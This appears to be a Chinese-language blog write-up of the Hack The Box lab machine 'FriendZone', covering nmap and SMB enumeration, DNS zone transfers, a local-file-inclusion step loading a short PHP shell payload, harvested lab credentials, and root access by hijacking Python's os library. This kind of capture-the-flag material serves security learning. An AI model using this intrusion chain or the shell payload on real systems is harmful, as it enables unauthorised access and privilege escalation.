<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.css" integrity="sha256-zM8WXtG4eUn7dKKNMTuoWZub++VnSfaOpA/8PJfvTBo=" crossorigin="anonymous">
<script class="next-config" data-name="main" type="application/json">{"hostname":"owefsad.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.23.1","exturl":false,"sidebar":{"position":"right","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>
<meta name="description" content="简介:靶机非CMS系统, 通过DNS漏洞、LFI和Hijacking可拿下靶机。在完成靶机的过程中有三个卡点, 后续将进行总结。 靶机状态: 已完成">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-Linux-FriendZone">
<meta property="og:url" content="https://owefsad.github.io/HTB-linux-FriendZone.html">
<meta property="og:site_name" content="owefsad">
<meta property="og:description" content="简介:靶机非CMS系统, 通过DNS漏洞、LFI和Hijacking可拿下靶机。在完成靶机的过程中有三个卡点, 后续将进行总结。 靶机状态: 已完成">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2019-06-10T15:42:57.000Z">
<meta property="article:modified_time" content="2025-06-21T08:45:38.086Z">
<meta property="article:author" content="owefsad">
<meta property="article:tag" content="privilege_escalation">
<meta property="article:tag" content="smb">
<meta property="article:tag" content="zone_transfer">
<meta property="article:tag" content="LFI">
<meta property="article:tag" content="Hijacking">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="https://owefsad.github.io/HTB-linux-FriendZone.html">
<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://owefsad.github.io/HTB-linux-FriendZone.html","path":"HTB-linux-FriendZone.html","title":"HTB-Linux-FriendZone"}</script>
<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>HTB-Linux-FriendZone | owefsad</title>
<script src="/js/third-party/analytics/baidu-analytics.js" defer></script>
<script async src="https://hm.baidu.com/hm.js?2a72b138b6ef81ae123fcd18e91fa843"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.umd.js" integrity="sha256-hiUEBwFEpLF6DlB8sGXlKo4kPZ46Ui4qGpd0vrVkOm4=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>
<script src="/js/third-party/fancybox.js" defer></script>
<noscript>
<link rel="stylesheet" href="/css/noscript.css">
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
<div class="headband"></div>
<main class="main">
<div class="column">
<header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="Toggle navigation bar" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<i class="logo-line"></i>
<p class="site-title">owefsad</p>
<i class="logo-line"></i>
</a>
<p class="site-subtitle" itemprop="description">owefsad page</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger" aria-label="Search" role="button">
</div>
</div>
</div>
<nav class="site-nav">
<ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-resume"><a href="/resume/" rel="section"><i class="fa fa-user fa-fw"></i>resume</a></li>
</ul>
</nav>
</header>
<aside class="sidebar">
<div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
<ul class="sidebar-nav">
<li class="sidebar-nav-toc">
Table of Contents
</li>
<li class="sidebar-nav-overview">
Overview
</li>
</ul>
<div class="sidebar-panel-container">
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
<div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95"><span class="nav-number">1.</span> <span class="nav-text">目录</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#nmap"><span class="nav-number">1.0.1.</span> <span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ftp"><span class="nav-number">1.0.2.</span> <span class="nav-text">ftp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#etbios-ssn-Samba"><span class="nav-number">1.0.3.</span> <span class="nav-text">netbios-ssn Samba</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dig"><span class="nav-number">1.0.4.</span> <span class="nav-text">dig</span></a></li></ol></li></ol></div>
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
<p class="site-author-name" itemprop="name">owefsad</p>
<div class="site-description" itemprop="description">分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具</div>
</div>
<div class="site-state-wrap animated">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">93</span>
<span class="site-state-item-name">posts</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/">
<span class="site-state-item-count">6</span>
<span class="site-state-item-name">categories</span></a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/">
<span class="site-state-item-count">173</span>
<span class="site-state-item-name">tags</span></a>
</div>
</nav>
</div>
<div class="links-of-author animated">
<span class="links-of-author-item">
<a href="https://github.com/exexute" title="GitHub → https://github.com/exexute" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:1547147759@gmail.com" title="E-Mail → mailto:1547147759@gmail.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
</span>
</div>
</div>
</div>
</div>
</aside>
</div>
<div class="main-inner post posts-expand">
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
<link itemprop="mainEntityOfPage" href="https://owefsad.github.io/HTB-linux-FriendZone.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="owefsad">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="owefsad">
<meta itemprop="description" content="分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具">
</span>
<span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
<meta itemprop="name" content="HTB-Linux-FriendZone | owefsad">
<meta itemprop="description" content="">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
HTB-Linux-FriendZone<a href="https://github.com/owefsad/blog/tree/main/source/_posts/HTB-linux-FriendZone.md" class="post-edit-link" title="Edit this post" rel="noopener" target="_blank"><i class="fa fa-pen-nib"></i></a>
</h1>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2019-06-10 23:42:57" itemprop="dateCreated datePublished" datetime="2019-06-10T23:42:57+08:00">2019-06-10</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">In</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
</span>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody"><p>简介:<br>靶机非CMS系统, 通过DNS漏洞、LFI和Hijacking可拿下靶机。在完成靶机的过程中有三个卡点, 后续将进行总结。</p>
<p>靶机状态: 已完成</p>
<span id="more"></span>
<h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h2><ul>
<li>SMB</li>
<li>Zone_Transfer</li>
<li>LFI</li>
<li>Hijacking</li>
</ul>
<blockquote>
<p>SMB</p>
</blockquote>
<h4 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h4><p>用nmap扫描机器的IP地址,发现开放的端口及对应的服务</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Nmap 7.70 scan initiated Sat May 25 23:31:31 2019 as: nmap -sC -sV -oA FriendZone 10.10.10.123</span></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.123</span><br><span class="line">Host is up (0.27s latency).</span><br><span 
class="line">Not shown: 993 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">21/tcp open ftp vsftpd 3.0.3</span><br><span class="line">22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey:</span><br><span class="line">| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)</span><br><span class="line">| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)</span><br><span class="line">|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)</span><br><span class="line">53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)</span><br><span class="line">| dns-nsid:</span><br><span class="line">|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu</span><br><span class="line">80/tcp open http Apache httpd 2.4.29 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: Friend Zone Escape software</span><br><span class="line">139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">443/tcp open ssl/http Apache httpd 2.4.29</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: 404 Not Found</span><br><span class="line">| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO</span><br><span class="line">| Not valid before: 2018-10-05T21:02:30</span><br><span class="line">|_Not valid after: 2018-11-04T21:02:30</span><br><span class="line">| tls-alpn:</span><br><span class="line">|_ http/1.1</span><br><span class="line">445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)</span><br><span class="line">Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span 
class="line">|_clock-skew: mean: -59m46s, deviation: 1h43m51s, median: 10s</span><br><span class="line">|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)</span><br><span class="line">| smb-os-discovery:</span><br><span class="line">| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)</span><br><span class="line">| Computer name: friendzone</span><br><span class="line">| NetBIOS computer name: FRIENDZONE\x00</span><br><span class="line">| Domain name: \x00</span><br><span class="line">| FQDN: friendzone</span><br><span class="line">|_ System <span class="keyword">time</span>: 2019-05-25T18:32:12+03:00</span><br><span class="line">| smb-security-mode:</span><br><span class="line">| account_used: guest</span><br><span class="line">| authentication_level: user</span><br><span class="line">| challenge_response: supported</span><br><span class="line">|_ message_signing: disabled (dangerous, but default)</span><br><span class="line">| smb2-security-mode:</span><br><span class="line">| 2.02:</span><br><span class="line">|_ Message signing enabled but not required</span><br><span class="line">| smb2-time:</span><br><span class="line">| <span class="built_in">date</span>: 2019-05-25 23:32:06</span><br><span class="line">|_ start_date: N/A</span><br></pre></td></tr></table></figure>
<h4 id="ftp"><a href="#ftp" class="headerlink" title="ftp"></a>ftp</h4><p>尝试ftp匿名登录失败</p>
<h4 id="etbios-ssn-Samba"><a href="#etbios-ssn-Samba" class="headerlink" title="netbios-ssn Samba"></a>netbios-ssn Samba</h4><p>用smbmap、smbclient查看可匿名登录的samba共享, 并从共享的文件中搜索敏感信息</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# smbmap -u guest -H 10.10.10.123</span><br><span class="line">[+] Finding open SMB ports....</span><br><span class="line">[+] Guest SMB session established on 10.10.10.123...</span><br><span class="line">[+] IP: 10.10.10.123:445 Name: 10.10.10.123</span><br><span class="line"> Disk Permissions</span><br><span class="line"> ---- -----------</span><br><span class="line"> <span class="built_in">print</span>$ NO ACCESS</span><br><span class="line"> Files NO ACCESS</span><br><span class="line"> general READ ONLY</span><br><span class="line"> Development READ, WRITE</span><br><span class="line"> IPC$ NO ACCESS</span><br><span class="line"></span><br><span class="line">root@kali:~# <span class="built_in">cat</span> creds.txt</span><br><span class="line">creds <span class="keyword">for</span> the admin THING:</span><br><span class="line"></span><br><span class="line">admin:WORKWORKHhallelujah@#</span><br></pre></td></tr></table></figure>
<blockquote>
<p>Zone_Transfer</p>
</blockquote>
<p>机器开放53(DNS)端口, 所以尝试搜集DNS中的信息</p>
<h4 id="dig"><a href="#dig" class="headerlink" title="dig"></a>dig</h4><p>这里有一个很坑的地方: 第一次根据WEB页面中的friendzoneportal.red邮箱后缀, 用dig查friendzoneportal.red的子域, 一直无法找到突破口; 后来在一份wp上看到需要查friendzone.red的子域, 但当时不清楚具体的原因(回看上面的nmap结果, 443端口证书的commonName就是friendzone.red, 这本身就是一条线索)。查出所有的子域名后, 找到可用的子域名administrator1.friendzone.red.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# dig axfr friendzoneportal.red @FriendZone.htb</span><br><span class="line"></span><br><span class="line">; <<>> DiG 9.11.5-P4-3-Debian <<>> axfr friendzoneportal.red @FriendZone.htb</span><br><span class="line">;; global options: +cmd</span><br><span class="line">friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800</span><br><span class="line">friendzoneportal.red. 604800 IN AAAA ::1</span><br><span class="line">friendzoneportal.red. 604800 IN NS localhost.</span><br><span class="line">friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">admin.friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">files.friendzoneportal.red. 
604800 IN A 127.0.0.1</span><br><span class="line">imports.friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">vpn.friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800</span><br><span class="line">;; Query <span class="keyword">time</span>: 252 msec</span><br><span class="line">;; SERVER: 10.10.10.123#53(10.10.10.123)</span><br><span class="line">;; WHEN: Sat Jun 01 03:31:49 EDT 2019</span><br><span class="line">;; XFR size: 9 records (messages 1, bytes 309)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 查看wp后继续进行</span></span><br><span class="line">➜ ~ dig axfr friendzone.red @FriendZone.htb</span><br><span class="line"></span><br><span class="line">; <<>> DiG 9.10.6 <<>> axfr friendzone.red @FriendZone.htb</span><br><span class="line">;; global options: +cmd</span><br><span class="line">friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800</span><br><span class="line">friendzone.red. 604800 IN AAAA ::1</span><br><span class="line">friendzone.red. 604800 IN NS localhost.</span><br><span class="line">friendzone.red. 604800 IN A 127.0.0.1</span><br><span class="line">administrator1.friendzone.red. 604800 IN A 127.0.0.1</span><br><span class="line">hr.friendzone.red. 604800 IN A 127.0.0.1</span><br><span class="line">uploads.friendzone.red. 604800 IN A 127.0.0.1</span><br><span class="line">friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800</span><br><span class="line">;; Query <span class="keyword">time</span>: 234 msec</span><br><span class="line">;; SERVER: 10.10.10.123#53(10.10.10.123)</span><br><span class="line">;; WHEN: Thu Jun 20 11:12:25 CST 2019</span><br><span class="line">;; XFR size: 8 records (messages 1, bytes 261)</span><br></pre></td></tr></table></figure>
<p>发现域名<strong>friendzoneportal.red.</strong>、<strong>admin.friendzoneportal.red.</strong>、<strong>files.friendzoneportal.red.</strong>、<strong>imports.friendzoneportal.red.</strong>、<strong>vpn.friendzoneportal.red.</strong>、<strong>friendzone.red</strong>、<strong>administrator1.friendzone.red.</strong>、<strong>hr.friendzone.red.</strong>、<strong>uploads.friendzone.red.</strong>, 共9个</p>
<blockquote>
<p>LFI</p>
</blockquote>
<p>访问administrator1.friendzone.red站点, 输入从SMB共享中找到的账号密码, 发现一处LFI(具体的LFI参数原文未给出), 通过SMB共享在Development目录中写入webshell即可获得反弹webshell:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="title function_ invoke__">system</span>(<span class="string">"/bin/sh -"</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>拿到webshell后, 成功读取user.txt</p>
<blockquote>
<p>Hijacking</p>
</blockquote>
<p>通过webshell后在网站目录中找到mysql数据库的账号密码:</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mysql_data.conf:</span><br><span class="line"> <span class="attribute">db_user</span>=friend</span><br><span class="line"> <span class="attribute">db_pass</span>=Agpyu12!0.213$</span><br><span class="line"> <span class="attribute">db_name</span>=FZ</span><br></pre></td></tr></table></figure>
<p>用账号密码登录ssh服务, 通过LinEnum.sh查找可利用弱点未果, 用pspy64查找系统中隐藏的内容时发现两个有意思的地方: 新用户登录时, 会用root权限设置环境变量并用相对路径执行cut命令; 机器会定时用root权限执行一次<code>/usr/bin/python /opt/server_admin/reporter.py</code>; 有了这两个内容后, 可以考虑Hijacking cut、Hijacking python的包或者修改/opt/server_admin/reporter.py文件提权;<br>通过<code>find / -type d -writable 2>/dev/null</code>查看可写目录, 发现PATH中的目录不可写, 但<code>/usr/lib/python2.7</code>目录可写, 因此Hijacking cut这条路不通, 考虑python; 最后通过Hijacking python的os包实现了提权.</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">friend<span class="variable">@FriendZone</span><span class="symbol">:/tmp</span><span class="variable">$ </span>cat owef.txt</span><br><span class="line">b0e6c60b8*********<span class="number">656</span>a9e90c7</span><br></pre></td></tr></table></figure>
<blockquote>
<p>卡点</p>
</blockquote>
<p>卡点1: dig查域传送时, 忽略了friendzone.red子域, 但是为什么会查这个子域呢? 可能猜测这块是我最不擅长的地方吧, 没想到查这个地方, 导致一直无法找到HAHA page(事后看, nmap结果中443端口证书的commonName已经给出了friendzone.red)。<br>卡点2: 找到HAHA page后, 需要通过LFI加载php文件, 但是一直无法找到有效目录, 后来用nmap自带的enum模块扫了一下smb端口才发现, 原来nmap枚举可以显示出共享文件对应的物理文件路径;<br>卡点3: python Hijacking, 初次遇到.</p>
<blockquote>
<p>参考文章</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://johnkoerner.com/codemash/codemash-ctf-solution-2019-08/">dig</a></p>
</div>
<footer class="post-footer">
<div class="followme">
<span>Welcome to my other publishing channels</span>
<div class="social-list">
<div class="social-item">
<span class="social-link">
<span class="icon">
<i class="fab fa-weixin"></i>
</span>
<span class="label">WeChat</span>
</span>
<img class="social-item-img" src="/uploads/wechat-qcode.jpg" alt="WeChat QR code">
</div>
<div class="social-item">
<a target="_blank" class="social-link" href="/uploads/avatar.gif">
<span class="icon">
<i class="fab fa-qq"></i>
</span>
<span class="label">QQ</span>
</a>
</div>
</div>
</div>
<div class="post-tags">
<a href="/tags/privilege-escalation/" rel="tag"># privilege_escalation</a>
<a href="/tags/smb/" rel="tag"># smb</a>
<a href="/tags/zone-transfer/" rel="tag"># zone_transfer</a>
<a href="/tags/LFI/" rel="tag"># LFI</a>
<a href="/tags/Hijacking/" rel="tag"># Hijacking</a>
</div>
<div class="post-nav">
<div class="post-nav-item">
<a href="/HTB-linux-SwagShop.html" rel="prev" title="HTB-Linux-SwagShop">
<i class="fa fa-angle-left"></i> HTB-Linux-SwagShop
</a>
</div>
<div class="post-nav-item">
<a href="/how-hacking-in-DNS.html" rel="next" title="How Hacking in DNS">
How Hacking in DNS <i class="fa fa-angle-right"></i>
</a>
</div>
</div>
</footer>
</article>
</div>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
© 2017 –
<span itemprop="copyrightYear">2025</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">owefsad</span>
</div>
</div>
</footer>
<div class="toggle sidebar-toggle" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
<div class="sidebar-dimmer"></div>
<div class="back-to-top" role="button" aria-label="Back to top">
<i class="fa fa-arrow-up fa-lg"></i>
<span>0%</span>
</div>
<a href="https://github.com/exexute" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>
<noscript>
<div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
</body>
</html>